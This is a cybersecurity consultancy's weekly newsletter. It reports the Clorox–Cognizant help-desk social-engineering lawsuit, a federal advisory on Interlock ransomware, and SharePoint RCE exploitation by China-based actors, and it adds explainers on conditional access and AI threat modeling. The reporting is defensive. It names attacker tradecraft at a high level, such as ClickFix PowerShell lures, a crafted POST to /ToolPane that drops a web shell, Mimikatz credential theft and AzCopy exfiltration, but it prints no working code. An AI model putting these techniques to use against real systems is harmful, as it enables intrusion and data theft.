Cyber Intelligence Weekly (July 20, 2025): Our Take on Three Things You Need to Know // Echelon Risk + Cyber

Welcome to our weekly newsletter where we share some of the major developments on the future of cybersecurity that you need to know about. Make sure to follow my LinkedIn page as well as Echelon’s LinkedIn page to receive updates on the future of cybersecurity!

To receive these and other curated updates to your inbox on a regular basis, please sign up for our email list here: https://echeloncyber.com/ciw-subscribe

Before we get started on this week’s CIW, I’d like to highlight a great case study with our friends at Montauk Renewables, Inc.!

Partnering with Echelon Risk + Cyber gave Montauk Renewables, Inc. more than just cybersecurity support; it gave them structure, clarity, and control. In just 12 months, they achieved:

🔒 90% reduction in critical vulnerabilities

📈 SEC compliance across complex IT & OT systems

⚙️ A scalable, strategic cybersecurity program built for resilience This is what happens when managed vCISO services meet deep OT expertise.

📘 Read the full case study to see how this partnership transformed cybersecurity into a business enabler: https://echeloncyber.com/intelligence/entry/montauk-renewable-gas-echelon-risk-cyber-vciso-cybersecurity-case-study

Away we go!

1. Clorox Sues Cognizant Over Password Resets That Opened Door to 2023 Hack

Clorox’s massive issue in cyberspace has splashed into the courtroom. In a newly‑filed complaint in California, the cleaning‑product titan accuses long‑time IT outsourcer Cognizant of handing attackers an engraved invitation to its corporate network during the August 2023 breach that hobbled production lines and wiped an estimated $380 million off the balance sheet. According to the suit, threat actors rang the Cognizant‑run help‑desk, claimed to be Clorox staff, and were granted repeated password resets and multi‑factor overrides—no manager checks, no identity prompts, all captured on call recordings. Clorox says the credentials unlocked Okta, VPN and Microsoft accounts, letting the intruders fan out through internal systems before security teams pulled the plug and reverted to manual order processing.

The disruption rippled for months: factories idled, supermarket shelves emptied, shipment volumes slid six percent, and consultants, forensics teams and system rebuilds racked up another $49 million in remediation spend. Although insurance has since recouped roughly a quarter of the losses, Clorox now wants Cognizant to foot the remaining bill and face punitive damages for “reckless disregard” of well‑documented password‑reset rules that required positive caller ID and manager confirmation.

Cognizant fired back in a statement, calling the lawsuit “shocking” and pinning blame on Clorox’s “inept internal cybersecurity,” insisting its remit was limited to routine help‑desk duties, not enterprise defense. The filing includes partial transcripts of the help‑desk calls: one agent resets both VPN and Okta credentials after the caller admits they’ve forgotten every password; a second agent twice wipes the same MFA device without challenge; yet another changes the SMS number tied to an administrator account. Within three hours, Clorox says, the adversaries had compromised a privileged security engineer and launched network‑wide reconnaissance.

Beyond the corporate finger‑pointing, the case is a textbook study in modern social‑engineering campaigns—low‑tech phone work defeating layers of expensive security tooling. For CISOs, the message is brutal but clear: “zero trust” starts at the service desk. Mandatory identity vetting, recorded decision logs, and automated “break‑glass” alerts for credential resets are no longer best‑practice; they’re existential safeguards.

Understanding Risks with Cloud Conditional Access Policies

Cloud conditional access policies (CAPs) are essential for securing cloud environments by enforcing authentication and access control rules based on user identity, device compliance, location, and risk level. While these policies enhance security, they also introduce potential risks that organizations must manage effectively.

Risks Associated with Conditional Access Policies

Misconfiguration and Overly Permissive Rules If conditional access policies are not configured correctly, they may grant unintended access to unauthorized users or block legitimate users, disrupting business operations. Organizations often struggle with balancing security and usability.

User Frustration and Productivity Loss Stringent access policies, such as frequent multi-factor authentication (MFA) prompts or location-based restrictions, can hinder user productivity. Employees may resort to insecure workarounds, such as using personal devices or weak passwords, to bypass restrictions.

False Positives and Legitimate Access Denials Conditional access policies rely on factors like IP addresses, device status, and geographic locations. However, legitimate users traveling or using VPNs may get locked out, leading to operational delays and increased support requests.

Insider Threats and Bypass Attempts While conditional access policies can prevent unauthorized external access, insiders with valid credentials may still exploit their access privileges. Without proper monitoring, an insider could manipulate policies to bypass security controls.

Integration Challenges with Legacy Systems Many organizations use a mix of cloud and on-premises solutions. Some legacy applications may not support modern conditional access policies, creating security gaps that attackers could exploit.

Mitigating Risks

Regularly review and test policies to ensure proper configurations.
Implement adaptive authentication to reduce user friction while maintaining security.
Monitor access logs for anomalies and insider threats.
Ensure legacy systems are updated or integrated securely with modern security solutions.

By carefully managing conditional access policies, organizations can enhance cloud security without compromising usability or operational efficiency. Thankfully SecureSloth released tool, noCAP, that can assist with the quick identification of misconfigured CAPs that may be abused by Threat Actors.

2. Feds: Filter the Web and Patch Fast—Interlock Ransomware Is on the Move

The FBI, CISA, HHS, and the MS‑ISAC have published an urgent #StopRansomware bulletin (alert AA25‑203A) warning that the Interlock extortion crew is stepping up its campaigns against critical‑infrastructure firms on both sides of the Atlantic. The joint notice, based on incident‑response work as recent as June 2025, confirms that the gang now routinely double‑extorts its victims—stealing data before encrypting virtual machines on both Windows and Linux hosts—and has begun experimenting with FreeBSD payloads as well. Federal analysts reiterate that Interlock’s entry point is often a silent drive‑by download hidden in a spoofed browser or “security‑tool” update, or a ClickFix‑style pop‑up that tricks users into pasting a Base64 PowerShell command.

Once a foothold is gained, operators deploy information‑stealers such as Lumma and Berserk, pivot with tools like AnyDesk, PuTTY and Cobalt Strike, and exfiltrate archives to Azure blobs via AzCopy before firing the conhost encryptor. Victims receive a terse !README! note plus a Tor URL—no upfront price tag—pressuring them to pay in Bitcoin or watch their data leak. Code overlaps and shared infrastructure continue to hint at a relationship with the earlier Rhysida franchise, but the advisory stresses that Interlock’s tactics are evolving quickly, including fresh filename camouflage that poses as FortiClient, GlobalProtect, or Cisco Secure Client installers.

The agencies outline four “do‑it‑today” defenses: deploy DNS and web‑filtering to block rogue downloads; patch OSes and firmware promptly; carve the network into security zones to blunt lateral movement; and enforce identity‑and‑access discipline with MFA across every service. They also urge healthcare providers to lean on newly released sector‑specific Cyber Performance Goals, and remind all organizations that paying the ransom rarely guarantees recovery—and does guarantee more criminal funding.

A full list of indicators (hashes, IPs, attacker toolset) plus STIX packages is bundled with the alert. The FBI asks victims—even those who resist payment—to preserve logs, sample encrypted files, and report incidents via IC3 or their local field office, noting that past submissions have directly enabled decryptor development and wallet tracing.

Threat Modeling Agentic AI using MAESTRO

In today’s rapidly evolving AI security landscape, identifying and mitigating potential threats is essential. The MAESTRO Threat Modeling Framework is an advanced methodology designed to help organizations systematically identify, assess, and prioritize Agentic AI risks. MAESTRO stands for Model, Analyze, Explore, Strategize, Track, and Optimize, representing the six core stages of this iterative process. For a detailed overview and instruction on how to use MAESTRO review this paper from the Cloud Security Alliance (CSA)

1. Model: The first phase focuses on creating a structured representation of the system or application. This includes identifying components, data flows, assets, and potential entry points. Accurate modeling helps establish a clear understanding of the architecture and its attack surfaces.

2. Analyze: In this phase, security experts evaluate the modeled system to identify vulnerabilities and potential threats. This involves applying various techniques, such as attack trees, STRIDE, or kill-chain analysis, to highlight weak points.

3. Explore: The exploration stage encourages teams to think creatively about possible attack vectors. Threat actors’ tactics, techniques, and procedures (TTPs) are considered to simulate real-world scenarios. This step ensures that unconventional or emerging threats are accounted for.

4. Strategize: Once threats are identified, the framework prioritizes them based on their likelihood and potential impact. Organizations develop mitigation strategies, including preventive controls, incident response plans, and compensating measures.

5. Track: Continuous monitoring and tracking of threats is essential. MAESTRO promotes dynamic updates to the threat model as the system evolves, ensuring new risks are consistently identified and addressed.

6. Optimize: Finally, MAESTRO emphasizes the importance of refining the process. By analyzing incidents, feedback, and security improvements, the framework becomes more effective over time.

By following the MAESTRO framework, organizations can create a structured and repeatable approach to threat modeling, improving their overall security posture and resilience against evolving cyber threats.

3. Microsoft Rushes Out SharePoint Fixes as Typhoon Crews and Storm‑2603 Exploit New RCE

Microsoft’s threat‑intel teams have confirmed a coordinated exploitation spree against on‑prem SharePoint farms, chaining a spoofing flaw (CVE‑2025‑49706) with a remote‑code bug (CVE‑2025‑49704) and their newer bypass twins (CVE‑2025‑53770/53771). The company has rushed out cumulative patches for SharePoint Server 2016, 2019 and Subscription Edition and is urging administrators to install them and recycle IIS the same day, then rotate ASP.NET machine keys. SharePoint Online remains unaffected.

Telemetry shows three China‑based groups abusing the bugs: long‑time espionage crews Linen Typhoon and Violet Typhoon are pillaging vulnerable portals for data, while a newer actor Microsoft tags Storm‑2603 is pushing Warlock ransomware after landing web‑shells such as spinstall0.aspx via a crafted POST to /ToolPane. Once inside, Storm‑2603 disables Defender rules, scrapes LSASS with Mimikatz, moves laterally with PsExec/Impacket, and finally uses Group Policy to fan out its encryptor across the estate.

Because the initial exploit works pre‑auth, Redmond recommends layering defenses beyond patching: enable AMSI in full mode with Defender AV, deploy EDR in block mode, enforce MFA, and segment internet‑facing SharePoint servers behind authenticated proxies where possible. Microsoft has published dozens of hashes, IPs (e.g., 65.38.121[.]198) and DocuSign‑look‑alike domains to block, plus hunting queries for Sentinel and Defender XDR; cloud‑delivered protection will already quarantine the web‑shell and RAT binaries under SuspSignoutReq and HijackSharePointServer detections.

Organizations that cannot patch immediately are advised to take servers offline or restrict them to VPN‑only access, then apply updates, restart IIS, rotate machine keys, and check for signs of compromise (new .aspx files under TEMPLATE\LAYOUTS, unexpected scheduled tasks, IIS back‑door DLLs). Given the speed with which these flaws have entered ransomware playbooks, every unpatched farm left online is now a standing invitation.

Thanks for reading!

About us: Echelon is a full-service cybersecurity consultancy that offers wholistic cybersecurity program building through vCISO or more specific solutions like penetration testing, red teaming, security engineering, cybersecurity compliance, and much more! Learn more about Echelon here: https://echeloncyber.com/about